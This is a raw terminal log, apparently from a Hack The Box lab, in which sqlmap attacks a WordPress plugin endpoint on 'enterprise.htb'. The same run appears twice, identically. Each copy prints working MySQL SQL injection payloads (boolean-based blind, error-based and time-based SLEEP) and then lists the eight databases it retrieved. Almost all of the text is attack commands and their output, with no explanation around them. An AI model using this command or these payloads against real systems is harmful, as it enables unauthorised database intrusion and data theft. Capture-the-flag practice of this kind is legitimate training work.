└─$ sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php?query=1 --batch --dbs
        ___
       __H__                                                                                                                                                                                                                                                                                                                
 ___ ___[)]_____ ___ ___  {1.6.7#stable}                                                                                                                                                                                                                                                                                    
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:50:48 /2022-12-27/

[21:50:48] [INFO] resuming back-end DBMS 'mysql' 
[21:50:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: query=(SELECT (CASE WHEN (1297=1297) THEN 1 ELSE (SELECT 5808 UNION SELECT 3400) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: query=1 AND (SELECT 8946 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(8946=8946,1))),0x716a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: query=1 AND (SELECT 5057 FROM (SELECT(SLEEP(5)))qmIa)
---
[21:50:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: PHP 5.6.31, Apache 2.4.10
back-end DBMS: MySQL >= 5.0
[21:50:50] [INFO] fetching database names
[21:50:50] [INFO] retrieved: 'information_schema'
[21:50:50] [INFO] retrieved: 'joomla'
[21:50:50] [INFO] retrieved: 'joomladb'
[21:50:51] [INFO] retrieved: 'mysql'
[21:50:51] [INFO] retrieved: 'performance_schema'
[21:50:51] [INFO] retrieved: 'sys'
[21:50:51] [INFO] retrieved: 'wordpress'
[21:50:51] [INFO] retrieved: 'wordpressdb'
available databases [8]:
[*] information_schema
[*] joomla
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[*] wordpressdb

[21:50:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/enterprise.htb'

[*] ending @ 21:50:51 /2022-12-27/
└─$ sqlmap -u http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php?query=1 --batch --dbs
        ___
       __H__                                                                                                                                                                                                                                                                                                                
 ___ ___[)]_____ ___ ___  {1.6.7#stable}                                                                                                                                                                                                                                                                                    
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                                                                                                   
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:50:48 /2022-12-27/

[21:50:48] [INFO] resuming back-end DBMS 'mysql' 
[21:50:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: query=(SELECT (CASE WHEN (1297=1297) THEN 1 ELSE (SELECT 5808 UNION SELECT 3400) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: query=1 AND (SELECT 8946 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(8946=8946,1))),0x716a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: query=1 AND (SELECT 5057 FROM (SELECT(SLEEP(5)))qmIa)
---
[21:50:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: PHP 5.6.31, Apache 2.4.10
back-end DBMS: MySQL >= 5.0
[21:50:50] [INFO] fetching database names
[21:50:50] [INFO] retrieved: 'information_schema'
[21:50:50] [INFO] retrieved: 'joomla'
[21:50:50] [INFO] retrieved: 'joomladb'
[21:50:51] [INFO] retrieved: 'mysql'
[21:50:51] [INFO] retrieved: 'performance_schema'
[21:50:51] [INFO] retrieved: 'sys'
[21:50:51] [INFO] retrieved: 'wordpress'
[21:50:51] [INFO] retrieved: 'wordpressdb'
available databases [8]:
[*] information_schema
[*] joomla
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
[*] wordpress
[*] wordpressdb

[21:50:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/enterprise.htb'

[*] ending @ 21:50:51 /2022-12-27/
